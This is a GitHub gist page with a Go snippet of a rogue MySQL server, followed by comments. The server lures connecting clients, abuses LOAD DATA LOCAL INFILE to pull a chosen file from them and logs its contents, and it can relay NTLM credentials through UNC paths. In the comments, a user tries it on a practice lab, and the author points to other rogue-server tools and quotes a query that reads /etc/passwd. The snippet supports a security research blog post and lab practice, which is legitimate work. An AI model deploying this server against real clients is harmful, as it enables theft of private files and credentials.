Skip to content

Instantly share code, notes, and snippets.

@bmaia bmaia/mysql_server.go Secret

Last active May 4, 2020
Embed
What would you like to do?
for mysql.Running() {
// tcp listener
conn, err := mysql.listener.AcceptTCP()
if err != nil {
log.Warning("Error while accepting TCP connection: %s", err)
continue
}
// send the mysql greeting
conn.Write([]byte(MySQLGreeting))
// read the incoming responses and retrieve infile
// TODO: include binary support and files > 16kb
b := make([]byte, 16384)
bufio.NewReader(conn).Read(b)
// parse client capabilities and validate connection
// TODO: parse mysql connections properly and
// display additional connection attributes
clientCapabilities := fmt.Sprintf("%08b", (int(uint32(b[4]) | uint32(b[5])<<8)))
if len(clientCapabilities) == 16 {
remoteAddress := strings.Split(conn.RemoteAddr().String(), ":")[0]
log.Info("MySQL connection from: %s", remoteAddress)
loadData := string(clientCapabilities[8])
log.Info("Can Use LOAD DATA LOCAL: %s", loadData)
username := bytes.Split(b[36:], []byte{0})[0]
log.Info("MySQL Login Request Username: %s", username)
// send initial responseOK
conn.Write([]byte(FirstResponseOK))
bufio.NewReader(conn).Read(b)
conn.Write([]byte(GetFile))
infileLen, err := bufio.NewReader(conn).Read(b)
if err != nil {
log.Warning("Error while reading buffer: %s", err)
continue
}
// check if the infile is an UNC path
if strings.HasPrefix(mysql.infile, "\\") {
log.Info("NTLM from '%s' relayed to %s", remoteAddress, mysql.infile)
} else {
// print the infile content, ignore mysql protocol headers
// TODO: include binary support and output to a file
log.Info("Retrieving '%s' from %s (%d bytes)\n%s", mysql.infile, remoteAddress, infileLen-9, string(b)[4:infileLen-4])
}
// send additional response
conn.Write([]byte(SecondResponseOK))
bufio.NewReader(conn).Read(b)
}
defer conn.Close()
(...)
@guanicoe

This comment has been minimized.

Copy link

guanicoe commented May 4, 2020

are the (...) on line 55 (en d) on purpose?

@bmaia

This comment has been minimized.

Copy link
Owner Author

bmaia commented May 4, 2020

are the (...) on line 55 (en d) on purpose?

Yes, this is just a code snippet for the blogpost here ->https://w00tsec.blogspot.com/2018/04/abusing-mysql-local-infile-to-read.html

The full source code for the server was merged into Bettercap, you can find it here:

https://github.com/bettercap/bettercap/blob/master/modules/mysql_server/mysql_server.go

@guanicoe

This comment has been minimized.

Copy link

guanicoe commented May 4, 2020

@bmaia I did not expect such swift response. I did check the code in bettercap as saw it was indeed included. I'm about to test your tool on htb thanks ;)

@guanicoe

This comment has been minimized.

Copy link

guanicoe commented May 4, 2020

Hey again, I'm having an issue with this tool related to bettercap/bettercap#572 . Basically I get [sys.log] [war] mysql.server unpexpected buffer size 4 error (I actually also corrected the typo in the main code)
I don't really know what it means nor how to troubleshoot.

image

FIY:

$mariadb -V
mariadb  Ver 15.1 Distrib 10.3.22-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2
$mysql -V
mysql  Ver 15.1 Distrib 10.3.22-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2

Do you think you could help?

@bmaia

This comment has been minimized.

Copy link
Owner Author

bmaia commented May 4, 2020

You can try to use other Rogue MySQL clients like the one below:

https://github.com/allyshka/Rogue-MySql-Server/blob/master/rogue_mysql_server.py

The best thing to do would be to set up a MariaDB 10.3.22 server, use a client to LOAD INDATA, check the mysql packets and try to replay them (see the snippets below for an example):

https://github.com/allyshka/Rogue-MySql-Server/blob/master/rogue_mysql_server.py#L112-L114

load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';

The post below is a good (and more recent) reference:

https://medium.com/@knownsec404team/mysql-client-arbitrary-file-reading-attack-chain-extension-727bb63f578c

@guanicoe

This comment has been minimized.

Copy link

guanicoe commented May 4, 2020

ok i'll give it a try. I did first try https://github.com/allyshka/Rogue-MySql-Server/blob/master/rogue_mysql_server.py but it spat a lot of exceptions and reading your post https://w00tsec.blogspot.com/2018/04/abusing-mysql-local-infile-to-read.html I thought I'd give bettercap a try as everything was integrated

#python rogue_mysql_server.py 
error: uncaptured python exception, closing channel <__main__.http_request_handler connected 10.10.10.187:49106 at 0x7fcd7c36f050> (<type 'exceptions.ValueError'>: [/usr/lib/python2.7/asyncore.py|read|83] [/usr/lib/python2.7/asyncore.py|handle_read_event|449] [/usr/lib/python2.7/asynchat.py|handle_read|147] [rogue_mysql_server.py|found_terminator|184])

@guanicoe

This comment has been minimized.

Copy link

guanicoe commented May 4, 2020

Just to let you know that your module works great, and that i was to blame.The error came from a malformed sql query

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.